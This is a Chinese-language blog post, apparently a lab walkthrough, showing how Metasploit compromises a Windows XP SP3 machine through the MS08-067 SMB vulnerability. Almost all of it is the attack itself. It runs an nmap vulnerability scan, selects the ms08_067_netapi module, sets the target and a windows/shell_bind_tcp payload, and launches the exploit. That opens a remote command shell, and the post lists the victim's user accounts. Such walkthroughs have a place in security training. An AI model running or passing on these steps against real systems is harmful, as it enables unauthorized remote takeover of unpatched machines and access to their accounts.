被攻击者IP地址:192.168.9.4,操作系统Windows XP sp3 English
攻击者IP地址:192.168.9.1
查看数据库连接状态
|
1 2 |
msf > db_status [*] postgresql connected to msf3 |
使用nmap扫描目标机器
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
msf > db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.9.4 [*] Nmap: Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-09-25 11:01 [*] Nmap: Nmap scan report for 192.168.9.4 [*] Nmap: Host is up (0.00s latency). [*] Nmap: Not shown: 997 closed ports [*] Nmap: PORT STATE SERVICE VERSION [*] Nmap: 135/tcp open msrpc Microsoft Windows RPC [*] Nmap: 139/tcp open netbios-ssn [*] Nmap: 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds [*] Nmap: MAC Address: 00:0C:29:43:D6:5F (VMware) [*] Nmap: Device type: general purpose [*] Nmap: Running: Microsoft Windows XP|2003 [*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003 [*] Nmap: OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003 [*] Nmap: Network Distance: 1 hop [*] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows [*] Nmap: Host script results: [*] Nmap: | smb-check-vulns: [*] Nmap: | MS08-067: VULNERABLE [*] Nmap: | Conficker: Likely CLEAN [*] Nmap: | regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run) [*] Nmap: | SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run) [*] Nmap: | MS06-025: CHECK DISABLED (remove 'safe=1' argument to run) [*] Nmap: |_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run) [*] Nmap: OS and Service detection performed. Please report any incorrect results athttp://nmap.org/submit/ . [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.28 seconds |
查找ms08_067漏洞
|
1 2 3 4 5 6 |
msf > search ms08_067 Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption |
使用MS08_067漏洞
|
1 |
msf > use exploit/windows/smb/ms08_067_netapi |
设置远程地址,正向连接
|
1 2 |
msf exploit(ms08_067_netapi) > set RHOST 192.168.9.4 RHOST => 192.168.9.4 |
设置ShellCode
|
1 2 |
msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp payload => windows/shell_bind_tcp |
显示配置的选项
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.9.4 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/shell_bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process, none LPORT 4444 yes The listen port RHOST 192.168.9.4 no The target address Exploit target: Id Name -- ---- 0 Automatic Targeting //expliot msf exploit(ms08_067_netapi) > exploit [*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 3 - lang:English [*] Selected Target: Windows XP SP3 English (AlwaysOn NX) [*] Attempting to trigger the vulnerability... [*] Command shell session 1 opened (192.168.9.1:1126 -> 192.168.9.4:4444) at 2012-09-25 11:04:31 +0800 |
成功返回Shell
|
1 2 3 4 5 6 7 8 9 |
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>net user net user User accounts for \\ ------------------------------------------------------------------------------- Administrator Guest hacker HelpAssistant SUPPORT_388945a0 The command completed with one or more errors. |
如果想看漏洞支持什么操作系统,可以输入info命令,就能看到关于漏洞的详细信息。
转载请注明:exchen's blog » ms08-067 漏洞远程溢出入侵测试